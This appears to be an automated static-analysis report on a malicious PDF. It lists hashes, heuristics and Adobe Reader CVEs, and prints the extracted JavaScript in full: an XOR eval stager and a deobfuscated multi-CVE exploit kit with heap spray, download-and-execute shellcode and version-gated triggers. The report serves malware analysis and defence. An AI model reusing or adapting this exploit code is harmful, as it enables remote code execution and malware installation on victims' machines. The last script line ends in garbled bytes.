Malicious PDF — malware analysis report

Static analysis result for SHA-256 ebdb592dac2e339d…

MALICIOUS

PDF

4.9 KB Created: 2010-08-07 11:41:17 Authoring application: Degixbiqe (via c6cc8Lihewaneqazawwo) First seen: 2026-05-10
MD5: 82036ea58061ffa607689a7439ccbc3e SHA-1: 6ac3ff402273dc72b436a9a297992e3340044b44 SHA-256: ebdb592dac2e339daf388e406d0bb8db8b5432adcdb8683847d2ce655f82b993
390 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, identified by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_PAGE_WORD_XOR_EVAL_STAGER heuristic indicates that this JavaScript is obfuscated and designed to launch a secondary payload. The extracted artifact 'javascript_obj0011_000.js' is likely part of this stager. The document body is heavily obfuscated and unreadable, providing no direct clues about the lure. The primary attack vector appears to be the execution of this embedded, obfuscated script.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ahrudc.egh/4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0xE27 794 bytes
SHA-256: d8942c674fe1390e8f4965a16f823d7234a1b0c03346366a2910526dc47de0ff
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function pageload() {var dE='var pA = 138 O;vOaOOr sH =O this;Ovar vU=sH.getPageNumWords(this.pageNum);var gBI=O\'\';for(OOvar gZ=0;gZ<O vU; gOZ+O+OO){gBI=[gBOOI,sH.OOgetPagOeNOthWord(sH.pageNuOm,gZ,true)].join(OO\'\');;}vaOr bK=\'\';fOOor(var OOgZ=0;gZ < gBI.Olength; gZ+=2){kXOOCOO=OOgBI.sOOubOsOOtr(OOgZ,2O);bK=OO[bK,StringO.fromChOOarCOOode(paOrseOOInt(kXC,16)^pOOA)].Ojoin(\'\');}eOOvOOal(bK)O;bK=null;'.replace(/[O]/g, '');try {var cXG = new Function(dE);if (document.getElementsByTagName){var clk_li = top.navigation.document.getElementsByTagName('li');}else if (document.all){var clk_li = top.navigation.document.all.tags('li');}else{return;}for (var i=0;i<clk_li.length;i++){if(clk_li[i].parentNode.id != 'tabsRow') {clk_li[i].onclick = showList_li;}}} catch(e){    cXG();}}pageload();
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3694 bytes
SHA-256: e6dd782005d28a4c92d66aac2384adaf7f4b00d91e7aba16b59ea0a4bf1a6a8a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var p=new String();var j=false;var x=new String();var tY='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';this.qT=18168;this.qT+=94;this.xM='';var qD=this.info['t'].replace(/[\s]/g, '');hA=1067;hA--;jI=[];var lO = this.info;var kX = (lO.producer.substr(0,5) == 'debug');var pQ = new Array(); var eL = "%u";function bE(str){str = str.split(eL);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function uZ(str1, str2){return [str1, str2].join("");}function n(fY){var aV = xI();var mDG = kD();aV += ((aV.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + mDG;if(kX) app.alert("URL: " + aV);aV=xA(aV);var d=eL;var kXC=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";kXC+=aV;return bE(kXC);};function xI(){var cX = (lO.author + lO.title).replace(/[\s]/g, '');var fS = aN(cX, qD, tY);return fS;};function aN(cX, tY, qD){var fS="";for(var i=0; i < cX.length; i++){var pE = tY.indexOf(cX[i]);if(pE > -1 ){fS += qD[pE];}}return fS;};function xA(cX){var out = "";cX = cN(cX);g = Math.round(cX.length / 4);if (g != cX.length /4) cX+="00";for(var i=0; i < cX.length; i+=4){out+= eL + cX.substr(i+2, 2) + cX.substr(i, 2);}return out;};function cN(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function nS(yP, len){while (yP.length * 2 < len){yP = uZ(yP, yP);}return yP.substring(0, len / 2);};function lW(mR){var hU = 0x0c0c0c0c;        qZ = n("pdf");if (mR == 1){hU = 0x30303030;}var xU = 0x400000;var ln = qZ.length * 2;var gT = xU - (ln + 0x38);var yP = bE(eL+"9090"+eL+"9090"); yP = nS(yP, gT);var zO = (hU - 0x400000) / xU;for (var sR = 0; sR < zO; sR ++ ){pQ[sR] = uZ(yP, qZ);}};function kD(){try {return app.viewerVersion.toString();}catch(rC){    return 0;}}if(kX) app.alert("called exploit");var mDG = kD();if(kX)  app.alert("v: " + mDG);if (mDG > 8){if(kX) app.alert("util.printf");lW(1);var aP = "12999999999999999999";for (v=0; v < 276; v++) aP += "8";util.printf("%45000f", aP);}if (mDG < 8){if(kX) app.alert("Collab.collectEmailInfo");lW(0);var hQ = bE(eL+"0c0c"+eL+"0c0c");while (hQ.length < 44952) hQ += hQ;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : hQ});}if (mDG < 9.1){if (app.doc.Collab.getIcon){if(kX) app.alert("Collab.getIcon");lW(0);var uP = unescape("%09");while (uP.length < 0x4000) uP += uP;uP = "N." + uP;app.doc.Collab.getIcon(uP);}}if (mDG == 9.2){if(kX) app.alert("media.newPlayer");lW(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}tI=["mV","pK"];bM=["gX","dA"];var lI={oN:23891};To�����$z

Open this report in the interactive analyzer, or submit your own file for analysis.